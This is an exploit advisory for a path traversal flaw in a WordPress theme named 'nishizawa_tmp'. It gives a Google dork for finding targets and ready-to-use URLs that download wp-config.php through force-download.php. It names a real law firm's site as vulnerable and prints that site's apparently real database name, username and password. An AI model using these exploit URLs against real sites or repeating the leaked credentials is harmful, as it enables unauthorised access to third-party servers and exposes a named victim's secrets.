############################################################################################
# Exploit Title : WordPress 4.x Nishizawa_Tmp Themes Database Configuration File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/03/2019
# Vendor Homepage : nishizawa-law.com - wordpress.org
# Software Information Link : nishizawa-law.com/english/about/aboutus.html
# Software Version : 4.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/wp-content/themes/nishizawa_tmp/
intext:Copyright (C) 2019 Nishizawa Internatinal Law Office All Rights Reserved.
# Vulnerability Type :
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
############################################################################################
# Impact :
***********
* WordPress 4.x Nishizawa_Tmp Themes is prone to a vulnerability that lets attackers download database config file because
the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files
within the context of the web server process and obtain potentially sensitive informations.
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct
a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve
to a location that is outside of that directory.
############################################################################################
# Vulnerable File :
****************
/force-download.php
# Vulnerable Parameter :
**********************
?file=
# Database Configuration File Download Exploit :
********************************************
/blog/wp-content/themes/nishizawa_tmp/force-download.php?file=../../../wp-config.php
/wp-content/themes/nishizawa_tmp/force-download.php?file=../../../wp-config.php
Informations About MySQL Database Configuration File =>
****************************************************
** The name of the database for WordPress */
define('DB_NAME', '');
/** MySQL database username */
define('DB_USER', '');
/** MySQL database password */
define('DB_PASSWORD', '');
/** MySQL hostname */
define('DB_HOST', '');
############################################################################################
# Example Vulnerable Sites :
*************************
[+] nishizawa-law.com/blog/wp-content/themes/nishizawa_tmp/force-download.php?file=../../../wp-config.php
// ** MySQL Database Configuration File
/** WordPress
define('DB_NAME', 'z113080_blog');
/** MySQL
define('DB_USER', 'z113080');
/** MySQL
define('DB_PASSWORD', 'wMX4iLcV');
/** MySQL
define('DB_HOST', '127.0.0.1');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', ''
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################